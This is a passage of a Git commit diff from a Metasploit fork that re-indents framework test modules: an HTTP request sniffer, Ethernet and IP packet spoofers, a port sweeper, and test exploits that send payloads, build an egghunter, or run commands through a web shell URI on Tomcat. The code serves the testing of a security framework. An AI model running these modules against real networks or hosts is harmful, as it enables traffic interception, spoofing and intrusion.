adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Retab all the things (except external/)

Browse Source
This commit is contained in:
Tab Assassin
2013-09-30 13:47:53 -05:00
parent 0ecba377f5
commit 2e8d19edcf
293 changed files with 32962 additions and 32962 deletions
Download Patch File Download Diff File Expand all files Collapse all files
test/modules/auxiliary/test/capture.rb
+38 -38
View File
@@ -15,49 +15,49 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Capture
include Msf::Auxiliary::Report
include Msf::Exploit::Capture
def initialize
super(
'Name' => 'Simple Network Capture Tester',
'Version' => '$Revision$',
'Description' => 'This module sniffs HTTP GET requests from the network',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Sniffer' ]
],
'PassiveActions' =>
[
'Sniffer'
],
'DefaultAction' => 'Sniffer'
)
def initialize
super(
'Name' => 'Simple Network Capture Tester',
'Version' => '$Revision$',
'Description' => 'This module sniffs HTTP GET requests from the network',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Sniffer' ]
],
'PassiveActions' =>
[
'Sniffer'
],
'DefaultAction' => 'Sniffer'
)
deregister_options('RHOST')
end
deregister_options('RHOST')
end
def run
print_status("Opening the network interface...")
open_pcap()
def run
print_status("Opening the network interface...")
open_pcap()
print_status("Sniffing HTTP requests...")
each_packet() do |pkt|
p = PacketFu::Packet.parse(pkt)
next unless p.is_tcp?
next if p.payload.empty?
if (p.payload =~ /GET\s+([^\s]+)\s+HTTP/smi)
url = $1
print_status("GET #{url}")
break if url =~ /StopCapture/
end
print_status("Sniffing HTTP requests...")
each_packet() do |pkt|
p = PacketFu::Packet.parse(pkt)
next unless p.is_tcp?
next if p.payload.empty?
if (p.payload =~ /GET\s+([^\s]+)\s+HTTP/smi)
url = $1
print_status("GET #{url}")
break if url =~ /StopCapture/
end
end
close_pcap()
print_status("Finished sniffing")
end
end
close_pcap()
print_status("Finished sniffing")
end
end
test/modules/auxiliary/test/check.rb
+30 -30
View File
@@ -9,39 +9,39 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test",
'Description' => %q{
This module ensures that 'check' actually functions for Auxiilary modules.
},
'References' =>
[
[ 'OSVDB', '0' ]
],
'Author' =>
[
'todb'
],
'License' => MSF_LICENSE
))
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test",
'Description' => %q{
This module ensures that 'check' actually functions for Auxiilary modules.
},
'References' =>
[
[ 'OSVDB', '0' ]
],
'Author' =>
[
'todb'
],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(80)
], self.class)
end
register_options(
[
Opt::RPORT(80)
], self.class)
end
def check
print_debug "Check is successful"
return Msf::Exploit::CheckCode::Vulnerable
end
def check
print_debug "Check is successful"
return Msf::Exploit::CheckCode::Vulnerable
end
def run
print_debug "Run is successful."
end
def run
print_debug "Run is successful."
end
end
test/modules/auxiliary/test/eth_spoof.rb
+34 -34
View File
@@ -15,43 +15,43 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Capture
include Msf::Auxiliary::Report
include Msf::Exploit::Capture
def initialize
super(
'Name' => 'Simple Ethernet Frame Spoofer',
'Version' => '$Revision$',
'Description' => 'This module sends spoofed ethernet frames',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Spoofer' ]
],
'DefaultAction' => 'Spoofer'
)
end
def initialize
super(
'Name' => 'Simple Ethernet Frame Spoofer',
'Version' => '$Revision$',
'Description' => 'This module sends spoofed ethernet frames',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Spoofer' ]
],
'DefaultAction' => 'Spoofer'
)
end
def run
print_status("Opening the network interface...")
open_pcap()
def run
print_status("Opening the network interface...")
open_pcap()
p = PacketFu::UDPPacket.new
p.eth_saddr = "00:41:41:41:41:41"
p.eth_daddr = "00:42:42:42:42:42"
p.ip_saddr = "41.41.41.41"
p.ip_daddr = "42.42.42.42"
p.udp_sport = 0x41
p.udp_dport = 0x42
p.payload = "SPOOOOOFED"
p.recalc
1.upto(10) do
capture.inject(p.to_s)
end
p = PacketFu::UDPPacket.new
p.eth_saddr = "00:41:41:41:41:41"
p.eth_daddr = "00:42:42:42:42:42"
p.ip_saddr = "41.41.41.41"
p.ip_daddr = "42.42.42.42"
p.udp_sport = 0x41
p.udp_dport = 0x42
p.payload = "SPOOOOOFED"
p.recalc
1.upto(10) do
capture.inject(p.to_s)
end
close_pcap()
print_status("Finished sending")
end
close_pcap()
print_status("Finished sending")
end
end
test/modules/auxiliary/test/ftp_data.rb
+60 -60
View File
@@ -13,82 +13,82 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Remote::Ftp
def initialize
super(
'Name' => 'FTP Client Exploit Mixin DATA test Exploit',
'Version' => '$Revision$',
'Description' => 'This module tests the "DATA" functionality of the ftp client exploit mixin.',
'Author' => [ 'Thomas Ring', 'jduck' ],
'License' => MSF_LICENSE
)
def initialize
super(
'Name' => 'FTP Client Exploit Mixin DATA test Exploit',
'Version' => '$Revision$',
'Description' => 'This module tests the "DATA" functionality of the ftp client exploit mixin.',
'Author' => [ 'Thomas Ring', 'jduck' ],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('UPLOADDIR', [ true, "The directory to use for the upload test", '/incoming' ])
]
)
end
register_options(
[
OptString.new('UPLOADDIR', [ true, "The directory to use for the upload test", '/incoming' ])
]
)
end
def run
def run
begin
if (not connect_login)
return
end
begin
if (not connect_login)
return
end
curdir = ""
curdir = ""
# change to the upload directory
result = send_cmd( ["CWD", datastore['UPLOADDIR']], true )
print_status("CWD response: #{result.inspect}")
# change to the upload directory
result = send_cmd( ["CWD", datastore['UPLOADDIR']], true )
print_status("CWD response: #{result.inspect}")
# find out what the server thinks this dir is
result = send_cmd( ["PWD"], true )
print_status("PWD response: #{result.inspect}")
if (result =~ /257\s\"(.+)\"/)
curdir = $1
end
curdir = "/" + curdir if curdir[0] != "/"
curdir << "/" if curdir[-1,1] != "/"
# find out what the server thinks this dir is
result = send_cmd( ["PWD"], true )
print_status("PWD response: #{result.inspect}")
if (result =~ /257\s\"(.+)\"/)
curdir = $1
end
curdir = "/" + curdir if curdir[0] != "/"
curdir << "/" if curdir[-1,1] != "/"
# generate some data to upload
data = Rex::Text.rand_text_alphanumeric(1024)
#print_status("data:\n" + Rex::Text.to_hex_dump(data))
# generate some data to upload
data = Rex::Text.rand_text_alphanumeric(1024)
#print_status("data:\n" + Rex::Text.to_hex_dump(data))
# test putting data
result = send_cmd_data(["PUT", curdir+"test"], data, "I")
print_status("PUT response: #{result.inspect}")
# test putting data
result = send_cmd_data(["PUT", curdir+"test"], data, "I")
print_status("PUT response: #{result.inspect}")
# test fallthrough
result = send_cmd_data(["HELP"], true)
print_status("HELP response: #{result.inspect}")
# test fallthrough
result = send_cmd_data(["HELP"], true)
print_status("HELP response: #{result.inspect}")
# test listing directory
result = send_cmd_data(["LS", curdir], "A")
print_status("LS response: #{result.inspect}")
# test listing directory
result = send_cmd_data(["LS", curdir], "A")
print_status("LS response: #{result.inspect}")
# test getting file
result = send_cmd_data(["GET", curdir+"test"], "A")
print_status("GET response: #{result[0].inspect}")
# test getting file
result = send_cmd_data(["GET", curdir+"test"], "A")
print_status("GET response: #{result[0].inspect}")
# see if it matches
if (result[1] != data)
print_error("Data doesn't match!")
else
print_good("Data downloaded matches what we uploaded!")
end
# see if it matches
if (result[1] != data)
print_error("Data doesn't match!")
else
print_good("Data downloaded matches what we uploaded!")
end
# adios
result = send_cmd( ["QUIT"], true )
print_status("QUIT response: #{result.inspect}")
# adios
result = send_cmd( ["QUIT"], true )
print_status("QUIT response: #{result.inspect}")
ensure
disconnect
end
ensure
disconnect
end
end
end
end
test/modules/auxiliary/test/ip_spoof.rb
+44 -44
View File
@@ -14,56 +14,56 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Auxiliary::Scanner
include Msf::Exploit::Capture
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Simple IP Spoofing Tester',
'Version' => '$Revision$',
'Description' => 'Simple IP Spoofing Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
def initialize
super(
'Name' => 'Simple IP Spoofing Tester',
'Version' => '$Revision$',
'Description' => 'Simple IP Spoofing Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
begin
require 'pcaprub'
@@havepcap = true
rescue ::LoadError
@@havepcap = false
end
begin
require 'pcaprub'
@@havepcap = true
rescue ::LoadError
@@havepcap = false
end
deregister_options('FILTER','PCAPFILE')
deregister_options('FILTER','PCAPFILE')
end
end
def run_host(ip)
open_pcap
p = PacketFu::UDPPacket.new
p.ip_saddr = ip
p.ip_daddr = ip
p.ip_ttl = 255
p.udp_sport = 53
p.udp_dport = 53
p.payload = "HELLO WORLD"
p.recalc
ret = send(ip,p)
if ret == :done
print_good("#{ip}: Sent a packet to #{ip} from #{ip}")
else
print_error("#{ip}: Packet not sent. Check permissions & interface.")
end
close_pcap
end
def run_host(ip)
open_pcap
p = PacketFu::UDPPacket.new
p.ip_saddr = ip
p.ip_daddr = ip
p.ip_ttl = 255
p.udp_sport = 53
p.udp_dport = 53
p.payload = "HELLO WORLD"
p.recalc
ret = send(ip,p)
if ret == :done
print_good("#{ip}: Sent a packet to #{ip} from #{ip}")
else
print_error("#{ip}: Packet not sent. Check permissions & interface.")
end
close_pcap
end
def send(ip,pkt)
begin
capture_sendto(pkt, ip)
rescue RuntimeError => e
return :error
end
return :done
end
def send(ip,pkt)
begin
capture_sendto(pkt, ip)
rescue RuntimeError => e
return :error
end
return :done
end
end
test/modules/auxiliary/test/recon_passive.rb
+55 -55
View File
@@ -15,66 +15,66 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::Tcp
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Actions' =>
[
['Continuous Port Sweep']
],
'PassiveActions' =>
[
'Continuous Port Sweep'
]
)
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Actions' =>
[
['Continuous Port Sweep']
],
'PassiveActions' =>
[
'Continuous Port Sweep'
]
)
register_options(
[
Opt::RHOST,
Opt::RPORT,
], self.class)
register_options(
[
Opt::RHOST,
Opt::RPORT,
], self.class)
end
end
def run
print_status("Running the simple recon module with action #{action.name}")
def run
print_status("Running the simple recon module with action #{action.name}")
case action.name
when 'Continuous Port Sweep'
while (true)
1.upto(65535) do |port|
datastore['RPORT'] = port
prober()
end
end
end
end
case action.name
when 'Continuous Port Sweep'
while (true)
1.upto(65535) do |port|
datastore['RPORT'] = port
prober()
end
end
end
end
def prober
begin
connect
disconnect
report_host(:host => datastore['RHOST'])
report_service(
:host => datastore['RHOST'],
:port => datastore['RPORT'],
:proto => 'tcp'
)
rescue ::Exception => e
case e.to_s
when /connection was refused/
report_host(:host => datastore['RHOST'])
else
print_status(e.to_s)
end
end
end
def prober
begin
connect
disconnect
report_host(:host => datastore['RHOST'])
report_service(
:host => datastore['RHOST'],
:port => datastore['RPORT'],
:proto => 'tcp'
)
rescue ::Exception => e
case e.to_s
when /connection was refused/
report_host(:host => datastore['RHOST'])
else
print_status(e.to_s)
end
end
end
end
test/modules/auxiliary/test/scanner_batch.rb
+20 -20
View File
@@ -15,30 +15,30 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT,
], self.class)
register_options(
[
Opt::RPORT,
], self.class)
end
end
def run_batch_size
3
end
def run_batch_size
3
end
def run_batch(batch)
print_status("Working on batch #{batch.join(",")}")
end
def run_batch(batch)
print_status("Working on batch #{batch.join(",")}")
end
end
test/modules/auxiliary/test/scanner_host.rb
+17 -17
View File
@@ -15,26 +15,26 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT,
], self.class)
register_options(
[
Opt::RPORT,
], self.class)
end
end
def run_host(ip)
print_status("Working on host #{ip}")
end
def run_host(ip)
print_status("Working on host #{ip}")
end
end
test/modules/auxiliary/test/scanner_range.rb
+19 -19
View File
@@ -15,29 +15,29 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT,
], self.class)
register_options(
[
Opt::RPORT,
], self.class)
end
end
def run_range(range)
print_status("Working on range #{range}")
rw = Rex::Socket::RangeWalker.new(range)
print_status("RangeWalker: #{rw.inspect}")
end
def run_range(range)
print_status("Working on range #{range}")
rw = Rex::Socket::RangeWalker.new(range)
print_status("RangeWalker: #{rw.inspect}")
end
end
test/modules/auxiliary/test/space-check.rb
+6 -6
View File
@@ -9,14 +9,14 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test",
'Description' => %q{
This module ensures that 'check' actually functions for Auxiilary modules.
super(update_info(info,
'Name' => "Check Test",
'Description' => %q{
This module ensures that 'check' actually functions for Auxiilary modules.
},
'References' =>
[
test/modules/exploits/test/aggressive.rb
+89 -89
View File
@@ -12,106 +12,106 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Aggressive Test Exploit',
'Description' =>
"This module tests the exploitation of a test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Any Platform',
{
'Platform' => [ 'linux', 'win' ]
}
],
[
'Test encoder specific',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'EncoderOptions' =>
{
'BufferRegister' => 'EBX',
'BufferOffset' => 4
}
}
},
],
[
'Cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
],
[ 'Test context encoder',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => "\x00"
}
}
]
],
'DefaultTarget' => 0))
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Aggressive Test Exploit',
'Description' =>
"This module tests the exploitation of a test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Any Platform',
{
'Platform' => [ 'linux', 'win' ]
}
],
[
'Test encoder specific',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'EncoderOptions' =>
{
'BufferRegister' => 'EBX',
'BufferOffset' => 4
}
}
},
],
[
'Cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
],
[ 'Test context encoder',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => "\x00"
}
}
]
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
end
connect
connect
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
sock.put(payload.encoded)
sock.put(payload.encoded)
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
handler
end
handler
end
end
test/modules/exploits/test/check.rb
+29 -29
View File
@@ -9,37 +9,37 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test Exploit",
'Description' => %q{
This module ensures that 'check' actually functions for Exploit modules.
},
'References' =>
[
[ 'OSVDB', '0' ]
],
'Author' =>
[
'todb'
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'May 23 2013'
))
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test Exploit",
'Description' => %q{
This module ensures that 'check' actually functions for Exploit modules.
},
'References' =>
[
[ 'OSVDB', '0' ]
],
'Author' =>
[
'todb'
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'May 23 2013'
))
register_options(
[
Opt::RPORT(80)
], self.class)
end
register_options(
[
Opt::RPORT(80)
], self.class)
end
def check
print_debug "Check is successful"
return Msf::Exploit::CheckCode::Vulnerable
end
def check
print_debug "Check is successful"
return Msf::Exploit::CheckCode::Vulnerable
end
def exploit
print_debug "Exploit is successful."
end
def exploit
print_debug "Exploit is successful."
end
end
test/modules/exploits/test/cmdweb.rb
+59 -59
View File
@@ -12,75 +12,75 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
Rank = ManualRanking
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Stager Web Test',
'Description' => %q{
This module tests the command stager mixin against a shell.jsp application installed
on an Apache Tomcat server.
},
'Author' => 'bannedit',
'Version' => '$Revision$',
'References' =>
[
],
'DefaultOptions' =>
{
},
'Payload' =>
{
},
'Platform' => 'win',
'Privileged' => true,
'Targets' =>
[
# need more but this will likely cover most cases
[ 'Automatic Targeting',
{
'auto' => true
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 03 2010'))
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Stager Web Test',
'Description' => %q{
This module tests the command stager mixin against a shell.jsp application installed
on an Apache Tomcat server.
},
'Author' => 'bannedit',
'Version' => '$Revision$',
'References' =>
[
],
'DefaultOptions' =>
{
},
'Payload' =>
{
},
'Platform' => 'win',
'Privileged' => true,
'Targets' =>
[
# need more but this will likely cover most cases
[ 'Automatic Targeting',
{
'auto' => true
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 03 2010'))
register_options(
[
Opt::RPORT(8080),
], self.class)
end
register_options(
[
Opt::RPORT(8080),
], self.class)
end
def autofilter
false
end
def autofilter
false
end
# This is method required for the CmdStager to work...
def execute_command(cmd, opts)
uri = opts[:uri]
http_hash = {
'uri' => uri.gsub(/CMDS/, Rex::Text.uri_encode(cmd))
}
resp = send_request_raw(http_hash, 5)
end
# This is method required for the CmdStager to work...
def execute_command(cmd, opts)
uri = opts[:uri]
http_hash = {
'uri' => uri.gsub(/CMDS/, Rex::Text.uri_encode(cmd))
}
resp = send_request_raw(http_hash, 5)
end
def exploit
def exploit
opts = {
:delay => 0.5,
:uri => "/shell/shell.jsp?cmd=CMDS"
}
opts = {
:delay => 0.5,
:uri => "/shell/shell.jsp?cmd=CMDS"
}
execute_cmdstager(opts)
execute_cmdstager(opts)
handler
handler
end
end
end
test/modules/exploits/test/dialup.rb
+37 -37
View File
@@ -12,46 +12,46 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Dialup
include Msf::Exploit::Remote::Dialup
def initialize(info = {})
super(update_info(info,
'Name' => 'Test Dialup Exploit',
'Description' => %q{
This exploit connects to a system's modem over dialup and provides
the user with a readout of the login banner.
},
'Version' => '$Revision$',
'Author' =>
[
'I)ruid',
],
'Arch' => ARCH_TTY,
'Platform' => ['unix'],
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 1000,
'BadChars' => '',
'DisableNops' => true,
},
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0))
end
def initialize(info = {})
super(update_info(info,
'Name' => 'Test Dialup Exploit',
'Description' => %q{
This exploit connects to a system's modem over dialup and provides
the user with a readout of the login banner.
},
'Version' => '$Revision$',
'Author' =>
[
'I)ruid',
],
'Arch' => ARCH_TTY,
'Platform' => ['unix'],
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 1000,
'BadChars' => '',
'DisableNops' => true,
},
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0))
end
def autofilter
false
end
def autofilter
false
end
def exploit
connect_dialup
handler
disconnect_dialup
end
def exploit
connect_dialup
handler
disconnect_dialup
end
end
test/modules/exploits/test/egghunter.rb
+66 -66
View File
@@ -12,87 +12,87 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Egghunter Test Exploit',
'Description' =>
"This module tests the exploitation of a test service using the Egghunter.",
'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => ARCH_X86,
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Egghunter Test Exploit',
'Description' =>
"This module tests the exploitation of a test service using the Egghunter.",
'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => ARCH_X86,
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0))
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ])
])
end
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ])
])
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
def exploit
connect
connect
print_status("Sending #{payload.encoded.length} byte payload...")
print_status("Sending #{payload.encoded.length} byte payload...")
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, {
:checksum => true
})
print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes")
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, {
:checksum => true
})
print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes")
sploit = ''
sploit = ''
# break before?
#sploit << "\xcc"
sploit << eh_stub
# just return otherwise
sploit << "\xc3"
# hopefully we find this!
sploit << eh_egg
# break before?
#sploit << "\xcc"
sploit << eh_stub
# just return otherwise
sploit << "\xc3"
# hopefully we find this!
sploit << eh_egg
sock.put(sploit)
sock.put(sploit)
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
handler
end
handler
end
end
test/modules/exploits/test/exploitme.rb
+104 -104
View File
@@ -12,123 +12,123 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'MIPS Aggressive Test Exploit',
'Description' => 'This module tests the exploitation of a test service',
'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
#'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'MaxNops' => 0,
#'BadChars' => "\x00",
#'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Mips big endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE
}
],
[
'Mips big endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips big endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
[
'Mips little endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE
}
],
[
'Mips little endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips little endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
def initialize(info = {})
super(update_info(info,
'Name' => 'MIPS Aggressive Test Exploit',
'Description' => 'This module tests the exploitation of a test service',
'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
#'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'MaxNops' => 0,
#'BadChars' => "\x00",
#'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Mips big endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE
}
],
[
'Mips big endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips big endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
[
'Mips little endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE
}
],
[
'Mips little endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips little endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
],
'DefaultTarget' => 0))
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
#puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
